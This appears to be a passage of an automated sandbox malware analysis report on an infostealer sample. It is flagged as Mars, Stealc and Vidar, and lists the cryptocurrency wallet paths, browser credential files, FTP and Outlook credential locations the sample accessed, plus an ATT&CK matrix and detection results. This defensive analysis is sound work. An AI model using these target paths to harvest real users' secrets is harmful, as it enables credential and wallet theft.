Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 4368, type: MEMORYSTR

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.7873c16243.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2838460669.0000000000DB1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2622413487.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2623849094.0000000001605000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7873c16243.exe PID: 6984, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.7873c16243.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2838460669.0000000000DB1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2622413487.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4368, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	12 Software Packing	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	236 System Information Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	761 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	251 Virtualization/Sandbox Evasion	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Process Injection	DCSync	251 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	46%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.ZPACK.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	100%	Avira	TR/Crypt.ZPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	100%	Avira	TR/Crypt.ZPACK.Gen
C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	46%	ReversingLabs	Win32.Trojan.Generic
